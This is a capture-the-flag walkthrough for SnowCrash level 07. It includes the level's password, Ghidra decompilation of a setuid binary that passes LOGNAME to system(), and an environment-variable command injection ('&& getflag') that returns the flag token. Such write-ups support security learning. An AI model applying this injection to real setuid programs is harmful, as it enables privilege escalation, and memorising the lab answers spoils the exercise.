# Level 07

## how to login

username: level07

password: wiok45aaoguiboiki2tuin6ub

## Goal

run `getflag` as user `flag07`

## Actually doing something

```bash
level07@SnowCrash:~$ ll
total 24
dr-x------ 1 level07 level07  120 Mar  5  2016 ./
d--x--x--x 1 root    users    340 Aug 30  2015 ../
-r-x------ 1 level07 level07  220 Apr  3  2012 .bash_logout*
-r-x------ 1 level07 level07 3518 Aug 30  2015 .bashrc*
-rwsr-sr-x 1 flag07  level07 8805 Mar  5  2016 level07*
-r-x------ 1 level07 level07  675 Apr  3  2012 .profile*
```

seems like reverse engineering to me

```bash
level07@SnowCrash:~$ ./level07 
level07
```

seems to be fun at parties indeed

lets crack open ghidra


```c
int main(int argc,char **argv,char **envp)

{
  char *pcVar1;
  int iVar2;
  char *buffer;
  gid_t gid;
  uid_t uid;
  char *local_1c;
  __gid_t local_18;
  __uid_t local_14;
  
  local_18 = getegid();
  local_14 = geteuid();
  setresgid(local_18,local_18,local_18);
  setresuid(local_14,local_14,local_14);
  local_1c = (char *)0x0;
  pcVar1 = getenv("LOGNAME");
  asprintf(&local_1c,"/bin/echo %s ",pcVar1);
  iVar2 = system(local_1c);
  return iVar2;
}
```
we have the classic setuid dance at the begining of the function, then a call to `getenv`+`asprintf`+`system`

I see a `system` so I know we are on track !

but lets go in order and clean up the code a bit

```c
int main(int argc,char **argv,char **envp)
{
  char *env;
  int ret;
  char *str;

  str = NULL;
  env = getenv("LOGNAME");
  asprintf(&str,"/bin/echo %s ",env);
  ret = system(str);
  return ret;
}
```

already way better

It looks like it does something like this:

- Get the Varaible `LOGNAME`
- Create a string that looks like `/bin/echo $LOGNAME` using asprintf
  asprintf is a way to create an allocated string with the format a regular printf would output
- call system to execute the created string

To me this reeks of simple `&& getflag`, lets try it out !

```bash
level07@SnowCrash:~$ LOGNAME="&& getflag" ./level07 

Check flag.Here is your token : fiumuikeil55xe9cu4dood66h
```